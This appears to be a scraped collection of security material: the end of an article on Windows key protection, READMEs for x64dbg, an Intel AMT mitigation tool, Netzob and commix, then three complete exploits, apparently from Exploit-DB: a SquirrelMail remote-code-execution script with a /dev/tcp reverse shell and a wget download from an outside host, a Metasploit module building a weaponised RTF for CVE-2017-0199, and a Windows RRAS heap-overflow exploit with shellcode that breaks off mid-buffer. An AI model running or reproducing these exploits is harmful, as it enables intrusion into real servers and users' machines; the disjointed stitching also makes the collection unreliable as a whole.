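    if not hmac.compare_digest(tag, expected):
        raise ValueError("wrong secret or corrupted blob")
    stream = _keystream(kek, len(ct))
    return bytes(a ^ b for a, b in zip(ct, stream))
```

The weakness the article describes survives intact in any such design: whoever can produce `user_secret` (or run code as that user) can unwrap the key, which is exactly why these mechanisms end up being a speed bump rather than a wall.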
In other words, even when these systems work, the key usually ends up being loaded into memory in the clear, where it is accessible to the user and their applications. This is important to understand, since the large majority of applications that use cryptography in Windows do so in the context of the user.

A better solution to protecting keys from the user is putting them behind protocol-specific APIs that "remote" the operation to a process in another user space. We would call this process isolation, and the best example of this in Windows is SCHANNEL. SCHANNEL is the TLS implementation in Windows; prior to Windows 2003, the keys used by SCHANNEL were loaded into the memory of the application calling it. In 2003 we moved the cryptographic operations into the Local Security Authority Subsystem Service (LSASS), which is essentially ring 0 in Windows. By moving the keys to this process we help protect them from user-mode processes, though we do not prevent access entirely, while still enabling applications to do TLS sessions. This comes at a cost: you now need to marshal data to and from user mode and LSASS, which hurts performance. [Nasko, a former SCHANNEL developer, tells me he believes it was the synchronous nature of SSPI that hurt the perf the most; this is likely, but the net result is the same.] In fact, this change was cited as one of the major reasons IIS was so much slower than Apache for "real workloads" in Windows Server 2003. It is worth noting that those of us involved in the decision to make this change surely felt vindicated when Heartbleed occurred.

This solution is not perfect either; again, if you are in ring 0 you can still access the cryptographic keys. When you want to address this risk, you remote the cryptographic operation to a dedicated system managed by a set of users that does not include the user. This could be a TCP/IP-remoted cryptographic service (like Microsoft KeyVault, or Google Cloud Key Manager), or maybe a Hardware Security Module (HSM) or smart card.
This has all of the performance problems of basic process isolation, but worse, because the transition from user mode to the protected service is even "further" away and more bandwidth-constrained (smart cards often run at 115k bps or slower). In Windows, for TLS, this is accomplished through providers to CNG, CryptoAPI CSPs, and smart card minidrivers. These solutions are usually closed source, and some of the security issues I have seen in them over the years are appalling, but despite their failings there is a lot of value in getting keys out of the user space, and this is the most effective way of doing that. These devices also provide, to varying degrees, protection from physical, timing and other more advanced attacks.

Well, that is my summary of the core key protection schemes available in Windows. Most operating systems have similar mechanisms; Windows just has superior documentation and has answers to each of these problems in "one logical place" vs. from many different libraries by different authors.

Ryan

Source: https://unmitigatedrisk.com/?p=586
x64dbg

Note
Please run install.bat before you start committing code; this ensures your code is auto-formatted to the x64dbg standards.

Compiling
For a complete guide on compiling x64dbg read this.

Downloads
Releases of x64dbg can be found here. The Jenkins build server can be found here.

Overview
x64dbg is an open-source x32/x64 debugger for Windows.

Features
- Open-source
- Intuitive and familiar, yet new user interface
- C-like expression parser
- Full-featured debugging of DLL and EXE files (TitanEngine)
- IDA-like sidebar with jump arrows
- IDA-like instruction token highlighter (highlight registers, etc.)
- Memory map
- Symbol view
- Thread view
- Source code view
- Content-sensitive register view
- Fully customizable color scheme
- Dynamically recognize modules and strings
- Import reconstructor integrated (Scylla)
- Fast disassembler (Capstone)
- User database (JSON) for comments, labels, bookmarks, etc.
- Plugin support with growing API
- Extendable, debuggable scripting language for automation
- Multi-datatype memory dump
- Basic debug symbol (PDB) support
- Dynamic stack view
- Built-in assembler (XEDParse/Keystone/asmjit)
- Executable patching
- Yara pattern matching
- Decompiler (Snowman)
- Analysis

License
x64dbg is licensed under GPLv3, which means you can freely distribute and/or modify the source of x64dbg, as long as you share your changes with us. The only exception is that plugins you write do not have to comply with the GPLv3 license; they do not have to be open-source and they can be commercial and/or private. The only exception to this is when your plugin uses code copied from x64dbg; in that case you would still have to share the changes to x64dbg with us.
Credits
- Debugger core by TitanEngine Community Edition
- Disassembly powered by Capstone
- Assembly powered by XEDParse, Keystone and asmjit
- Import reconstruction powered by Scylla
- JSON powered by Jansson
- Database compression powered by lz4
- Advanced pattern matching powered by yara
- Decompilation powered by snowman
- Bug icon by VisualPharm
- Interface icons by Fugue
- Website by tr4ceflow

Special Thanks
All the donators! Everybody adding issues! People I forgot to add to this list. EXETools community, Tuts4You community, ReSharper, Coverity, acidflash, cyberbob, cypher, Teddy Rogers, TEAM DVT, DMichael, Artic, ahmadmansoor, _pusher_, firelegend, kao, sstrato, kobalicek

Developers
mrexodia, Sigma, tr4ceflow, Dreg, Nukem, Herz3h, torusrxxx

Contributors
blaquee, wk-952, RaMMicHaeL, lovrolu, fileoffset, SmilingWolf, ApertureSecurity, mrgreywater, Dither, zerosum0x0, RadicalRaccoon, fetzerms, muratsu, ForNeVeR, wynick27, Atvaark, Avin, mrfearless, Storm Shadow, shamanas, joesavage, justanotheranonymoususer, gushromp, Forsari0

Link: https://github.com/x64dbg/x64dbg

I tested it recently; it is stable and capable.
Disable Intel AMT

Tool to disable Intel AMT on Windows. Runs on both x86 and x64 Windows operating systems.

Download: DisableAMT.exe / DisableAMT.zip

What?
On 02 May 2017, Embedi discovered "an escalation of privilege vulnerability in Intel® Active Management Technology (AMT), Intel® Standard Manageability (ISM), and Intel® Small Business Technology firmware versions 6.x, 7.x, 8.x, 9.x, 10.x, 11.0, 11.5, and 11.6 that can allow an unprivileged attacker to gain control of the manageability features provided by these products". Read also: Intel Active Management Technology, Intel Small Business Technology, and Intel Standard Manageability Escalation of Privilege. Assigned CVE: CVE-2017-5689

Wait, what?
Your machine may be vulnerable to hackers.

How do I know if I'm affected?
If you see any of these stickers or badges on your laptop, notebook or desktop, you are likely affected by this. You may want to read: How To Find Intel® vPro™ Technology Based PCs

Usage
Simple. Download and run DisableAMT.exe, and it will do the work for you. This is based on the instructions provided by the INTEL-SA-00075 Mitigation Guide. When executing the tool, it will run quickly and, when done, will present you with the following screen. Type Y or N if you would also like to automatically disable (by renaming) the actual LMS.exe (Intel Local Management Service) binary. When finished, a logfile will open up. Reboot your machine at this point. That's all!

Details about the tool
The tool is simply written in batch, and has the necessary components inside to unconfigure AMT. The batch file was compiled to an executable using the free version of Quick Batch File Compiler, and subsequently packed with UPX to reduce filesize. Additionally, ACUConfig.exe and ACU.dll from Intel's Setup and Configuration Software package are included. You may find all these files in the 'src' folder.
Please find hashes below:

DisableAMT.exe
  MD5:    3a7f3c23ea25279084f0245dfa7ecb21
  SHA1:   383fc99f149c4aec3536ed5370dc4b07f7f93028
  SHA256: f0cecef7f5d1b8be8feeddf83c71892bf9dd6e28b325f88e0c071c6be34b8c19

DisableAMT.zip
  MD5:    0458d8e23a527e74b567d7fa4b342fec
  SHA1:   f7b73115bfbacaea32da833deaf7c1187d1bfc40
  SHA256: 143ffd107c3861a95e829d26baeb30316ded89bb494e74467bcfb8219f895c3b

DisableAMT.bat
  MD5:    c00bc5a37cb7a66f53aec5e502116a5c
  SHA1:   51ca8a7c3f5a81a31115618af4245df13aa39a90
  SHA256: a58c56c61ba7eae6d0db27b2bc02e05444befca885b12d84948427fff544378a

ACUConfig.exe
  MD5:    4117b39f1e6b599f758d59f34dc7642c
  SHA1:   7595bc7a97e7ddab65f210775e465aa6a87df4fd
  SHA256: 475e242953ab8e667aa607a4a7966433f111f8adbb3f88d8b21052b4c38088f7

ACU.dll
  MD5:    a98f9acb2059eff917b13aa7c1158150
  SHA1:   d869310f28fce485da0c099f7df349c82a005f30
  SHA256: c569d9ce5024bb5b430bab696f2d276cfdc068018a84703b48e6d74a13dadfd7

Is there an easier way to do this? Probably.

Link: https://github.com/bartblaze/Disable-Intel-AMT
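Hashes like the ones above are easy to check before running a downloaded tool. A small sketch (the file path is a placeholder; the reference values come from the published table):

```python
import hashlib


def file_hashes(path, chunk_size=65536):
    """Compute MD5, SHA1 and SHA256 of a file in a single pass."""
    digests = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    with open(path, "rb") as fh:
        # Read in chunks so large binaries do not have to fit in memory.
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for d in digests.values():
                d.update(chunk)
    return {name: d.hexdigest() for name, d in digests.items()}
```

Usage: compare `file_hashes("DisableAMT.exe")["sha256"]` against the value from the table above before executing the tool.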
Netzob : Protocol Reverse Engineering, Modeling and Fuzzing

About
Welcome to the official repository of Netzob. Netzob is a tool that can be used to reverse engineer, model and fuzz communication protocols. It is made of two components:

- netzob: a Python project that exposes all the features of Netzob (except the GUI), which you can import into your own tool or use from the CLI
- netzob_web: a graphical interface that leverages web technologies

Source code, documentation and resources are available for each component; please visit their dedicated directories.

General Information
Email: contact@netzob.org
Mailing list: Two lists are available; use the SYMPA web interface to register.
IRC: You can hang out with us on Freenode's IRC channel #netzob @ freenode.org.
Twitter: Follow Netzob's official account (@Netzob)

Authors, Contributors and Sponsors
See the top distribution file AUTHORS.txt in each component for the detailed and updated list of their authors, contributors and sponsors.

Extra
Zoby, the official mascot of Netzob.

Link: https://github.com/netzob/netzob
General Information
Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos (@ancst) that can be used by web developers, penetration testers or even security researchers in order to test web-based applications with a view to finding bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.

Disclaimer
This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes!

Requirements
Python version 2.6.x or 2.7.x is required for running this program.

Installation
Download commix by cloning the Git repository:

git clone https://github.com/commixproject/commix.git commix

Commix comes packaged in the official repositories of the following Linux distributions, so you can use the package manager to install it: ArchStrike, BlackArch Linux, BackBox, Kali Linux, Parrot Security OS, Weakerthan Linux.

Commix also comes as a plugin on the following penetration testing frameworks: TrustedSec's Penetration Testers Framework (PTF), OWASP Offensive Web Testing Framework (OWTF), CTF-Tools, PentestBox, PenBox, Katoolin, Aptive's Penetration Testing tools, Homebrew Tap - Pen Test Tools.

Supported Platforms
Linux, Mac OS X, Windows (experimental)

Usage
To get a list of all options and switches use:

python commix.py -h

Q: Where can I check all the available options and switches?
A: Check the 'usage' wiki page.

Usage Examples
Q: Can I get some basic ideas on how to use commix?
A: Just go and check the 'usage examples' wiki page, where there are several test cases and attack scenarios.

Upload Shells
Q: How easily can I upload web-shells on a target host via commix?
A: Commix enables you to upload web-shells (e.g. the Metasploit PHP meterpreter) easily on a target host. For more, check the 'upload shells' wiki page.
Modules Development
Q: Do you want to increase the capabilities of the commix tool and/or adapt it to your needs?
A: You can easily develop and import your own modules. For more, check the 'module development' wiki page.

Command Injection Testbeds
Q: How can I test or evaluate the exploitation abilities of commix?
A: Check the 'command injection testbeds' wiki page, which includes a collection of pwnable web applications and/or VMs (that include web applications) vulnerable to command injection attacks.

Exploitation Demos
Q: Is there a place where I can check demos of commix?
A: If you want to see a collection of demos about the exploitation abilities of commix, take a look at the 'exploitation demos' wiki page.

Bugs and Enhancements
Q: I found a bug / I have a new feature to suggest! What can I do?
A: For bug reports or enhancements, please open an issue here.

Presentations and White Papers
Q: Is there a place where I can find presentations and/or white papers regarding commix?
A: For presentations and/or white papers published in conferences, check the 'presentations' wiki page.

Support and Donations
Q: Apart from tech stuff (bug reports or enhancements), is there any other way I can support the development of commix?
A: Sure! Commix is the outcome of many hours of work and total personal dedication. Feel free to donate via PayPal to donations@commixproject.com and instantly prove your feelings for it! :)

Link: https://github.com/commixproject/commix
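The class of bug commix automates the discovery of can be reduced to a two-line illustration. The snippet below is a deliberately vulnerable toy, not commix code, and `echo` stands in for a real command such as `ping`: interpolating user input into a shell command line lets a `;`-separated payload run arbitrary commands, while passing arguments as a list keeps shell metacharacters literal.

```python
import subprocess


def run_vulnerable(host):
    # VULNERABLE: user input is pasted straight into a shell command line,
    # so "; <anything>" in `host` becomes a second command.
    cmd = "echo pinging %s" % host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_safe(host):
    # Safe: no shell is involved, so metacharacters stay literal arguments.
    return subprocess.run(["echo", "pinging", host],
                          capture_output=True, text=True).stdout


payload = "localhost; echo INJECTED"
print(run_vulnerable(payload))  # the injected echo executes as its own command
print(run_safe(payload))        # the payload is printed back verbatim
```

Tools like commix send payloads of exactly this shape into parameters and headers and look for evidence (output markers, time delays) that the injected command actually ran.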
Published on May 3, 2017

We take a look into the malware Gatak, which uses WriteProcessMemory and CreateRemoteThread to inject code into rundll32.exe. Many thanks to @_jsoo_ for providing the sample!

Follow me on Twitter: https://twitter.com/struppigel
Gatak VirusBtn article: https://www.virusbulletin.com/virusbu...
Sample: https://www.hybrid-analysis.com/sampl...
API Monitor: http://www.rohitab.com/apimonitor
Process Explorer: https://technet.microsoft.com/en-us/s...
x64dbg: http://x64dbg.com/
HxD: https://mh-nexus.de/en/hxd/
#!/bin/bash
#
int='\033[94m __ __ __ __ __ / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ /____/

SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)

SquirrelMail_RCE_exploit.sh (ver. 1.0)

Discovered and coded by Dawid Golunski (@dawid_golunski)
https://legalhackers.com

ExploitBox project: https://ExploitBox.io
\033[0m'

# Quick and messy PoC for SquirrelMail webmail application.
# It contains payloads for 2 vectors:
# * File Write
# * RCE
# It requires user credentials and that SquirrelMail uses
# Sendmail method as email delivery transport
#
#
# Full advisory URL:
# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
# Exploit URL:
# https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh
#
# Tested on:
# Ubuntu 16.04
# squirrelmail package version:
# 2:1.4.23~svn20120406-2ubuntu1.16.04.1
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
# Stay tuned for my new project - ExploitBox
#
# .;lc'
# .,cdkkOOOko;.
# .,lxxkkkkOOOO000Ol'
# .':oxxxxxkkkkOOOO0000KK0x:'
# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
# '';ldxxxxxdc,. ,oOXXXNNNXd;,.
# .ddc;,,:c;. ,c: .cxxc:;:ox:
# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
# .dxxxxxdl;. ., .. .;cdxxxxxx:
# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
# .':oxxxxxxxxx.ckkkkkkkkxl,.
# .,cdxxxxx.ckkkkkxc.
# .':odx.ckxl,.
# .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------

sqspool="/var/spool/squirrelmail/attach/"

echo -e "$int"
#echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n"
#echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n"
#echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n"

# Base URL
if [ $# -ne 1 ]; then
    echo -e "Usage: \n$0 SquirrelMail_URL"
    echo -e "Example: \n$0 http://target/squirrelmail/ \n"
    exit 2
fi
URL="$1"

# Log in
echo -e "\n[*] Enter SquirrelMail user credentials"
read -p "user: " squser
read -sp "pass: " sqpass

echo -e "\n\n[*] Logging in to SquirrelMail at $URL"
curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect
if [ $? -eq 0 ]; then
    echo "Invalid creds"
    exit 2
fi
sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"

# Prepare Sendmail cnf
#
# * The config will launch php via the following stanza:
#
# Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
# T=DNS/RFC822/X-Unix,
# A=php -- $u $h ${client_addr}
#
wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf

# Upload config
echo -e "\n\n[*] Uploading Sendmail config"
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`"
if [ ${#attachid} -lt 32 ]; then
    echo "Something went wrong. Failed to upload the sendmail file."
    exit 2
fi

# Create Sendmail cmd string according to selected payload
echo -e "\n\n[?] Select payload\n"
# SELECT PAYLOAD
echo "1 - File write (into /tmp/sqpoc)"
echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"
echo
read -p "[1-2] " pchoice
case $pchoice in
    1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc" ;;
    2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid" ;;
esac
if [ $pchoice -eq 2 ]; then
    echo
    read -p "Reverese shell IP: " reverse_ip
    read -p "Reverese shell PORT: " reverse_port
fi

# Reverse shell code
phprevsh="
<?php
\$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\";
file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);
system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");
?>"

# Set sendmail params in user settings
echo -e "\n[*] Injecting Sendmail command parameters"
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null
if [ $? -ne 0 ]; then
    echo "Failed to inject sendmail parameters"
    exit 2
fi

# Send email which triggers the RCE vuln and runs phprevsh
echo -e "\n[*] Sending the email to trigger the vuln"
(sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \
-d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &

if [ $pchoice -eq 2 ]; then
    echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"
    nc -vv -l -p $reverse_port
else
    echo -e "\n[*] The test file should have been written at /tmp/sqpoc"
fi

grep -q "302 Found" /tmp/sheaders
if [ $? -eq 1 ]; then
    echo "There was a problem with sending email"
    exit 2
fi

# Done
echo -e "\n[*] All done. Exiting"

Source: https://www.exploit-db.com/exploits/41910/
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => "Microsoft Office Word Malicious Hta Execution", 'Description' => %q{ This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a olelink object can make a http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample. }, 'Author' => [ 'Haifei Li', # vulnerability analysis 'ryHanson', 'wdormann', 'DidierStevens', 'vysec', 'Nixawk', # module developer 'sinn3r' # msf module improvement ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2017-0199'], ['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'], ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'], ['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'], ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'], ['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'], ['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'], ['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'], ['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'], ['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'], 
['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'], ['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'], ['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'], ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199'] ], 'Platform' => 'win', 'Targets' => [ [ 'Microsoft Office Word', {} ] ], 'DefaultOptions' => { 'DisablePayloadHandler' => false }, 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => 'Apr 14 2017')) register_options([ OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']), OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta']) ], self.class) end def generate_uri uri_maxlength = 112 host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'] scheme = datastore['SSL'] ? 'https' : 'http' uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}" uri = Rex::Text.hexify(Rex::Text.to_unicode(uri)) uri.delete!("\n") uri.delete!("\\x") uri.delete!("\\") padding_length = uri_maxlength * 2 - uri.length fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative? padding_length.times { uri << "0" } uri end def create_ole_ministream_data # require 'rex/ole' # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ) # ministream = ole.instance_variable_get(:@ministream) # ministream_data = ministream.instance_variable_get(:@data) ministream_data = "" ministream_data << "01000002090000000100000000000000" # 00000000: ................ ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K...... ministream_data << generate_uri ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.] 
ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............ ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................ ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7........... ministream_data << "00000000000000000000000000000000" # 000000f0: ................ ministream_data << "100203000d0000000000000000000000" # 00000100: ................ ministream_data << "00000000000000000000000000000000" # 00000110: ................ ministream_data << "00000000000000000000000000000000" # 00000120: ................ ministream_data << "00000000000000000000000000000000" # 00000130: ................ ministream_data << "00000000000000000000000000000000" # 00000140: ................ ministream_data << "00000000000000000000000000000000" # 00000150: ................ ministream_data << "00000000000000000000000000000000" # 00000160: ................ ministream_data << "00000000000000000000000000000000" # 00000170: ................ ministream_data << "00000000000000000000000000000000" # 00000180: ................ ministream_data << "00000000000000000000000000000000" # 00000190: ................ ministream_data << "00000000000000000000000000000000" # 000001a0: ................ ministream_data << "00000000000000000000000000000000" # 000001b0: ................ ministream_data << "00000000000000000000000000000000" # 000001c0: ................ ministream_data << "00000000000000000000000000000000" # 000001d0: ................ ministream_data << "00000000000000000000000000000000" # 000001e0: ................ ministream_data << "00000000000000000000000000000000" # 000001f0: ................ 
    ministream_data
  end

  def create_rtf_format
    template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
    template_rtf = ::File.open(template_path, 'rb')
    data = template_rtf.read(template_rtf.stat.size)
    data.gsub!('MINISTREAM_DATA', create_ole_ministream_data)
    template_rtf.close
    data
  end

  def on_request_uri(cli, req)
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework, ARCH_X86, 'win', p.encoded, 'hta-psh',
      { :arch => ARCH_X86, :platform => 'win' }
    )

    # This allows the HTA window to be invisible
    data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end

  def exploit
    file_create(create_rtf_format)
    super
  end
end

Source: https://www.exploit-db.com/exploits/41934/
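The URI mangling in generate_uri above (Rex::Text.to_unicode, then hexify, then the delete! calls that strip the backslash-x escapes) boils down to hex-encoding the UTF-16LE bytes of the URI and right-padding with ASCII '0' up to uri_maxlength * 2 hex digits. A minimal Python sketch of that transformation, assuming hexify's lowercase \xNN notation:

```python
def encode_uri(uri, uri_maxlength=112):
    # Rex::Text.to_unicode -> UTF-16LE bytes; Rex::Text.hexify -> "\xNN" pairs;
    # the delete! calls then strip '\', 'x' and newlines, leaving bare hex digits.
    data = uri.encode("utf-16-le").hex()
    padding = uri_maxlength * 2 - len(data)
    if padding < 0:
        raise ValueError("please use a uri < %d bytes" % uri_maxlength)
    return data + "0" * padding

# "http://a" -> 68 00 74 00 74 00 70 00 3a 00 ... padded out to 224 hex digits
assert encode_uri("http://a").startswith("68007400740070003a00")
assert len(encode_uri("http://a")) == 224
```

The zero-padding keeps the hex blob at a fixed 224 digits, so the length of the surrounding OLE ministream data stays constant no matter how short the URI is.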
-
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##################################################################################
# By Victor Portal (vportal), for educational purposes only                      #
##################################################################################
# This exploit is the Python version of the ErraticGopher exploit, probably     #
# with some modifications. ErraticGopher exploits a memory corruption           #
# (it appears to be a heap overflow) in the Windows DCE-RPC call MIBEntryGet.   #
# Because of the magic bytes, the application redirects execution to the        #
# iprtrmgr.dll library, where a REP MOVS instruction (0x641194f5) copies        #
# the injected stub from the heap to the stack, overwriting a return address    #
# as well as the SEH handler stored on the stack, making it possible to         #
# control the execution flow, disable DEP and jump to the shellcode             #
# as SYSTEM.                                                                    #
##################################################################################

# The exploit only works if the target has the RRAS service enabled
# Tested on Windows Server 2003 SP2

import struct
import sys
import time
import os
from threading import Thread
from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transport

target = sys.argv[1]

print '[-]Initiating connection'
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
dce = trans.DCERPC_class(trans)
# RRAS DCE-RPC call
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
buf = ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
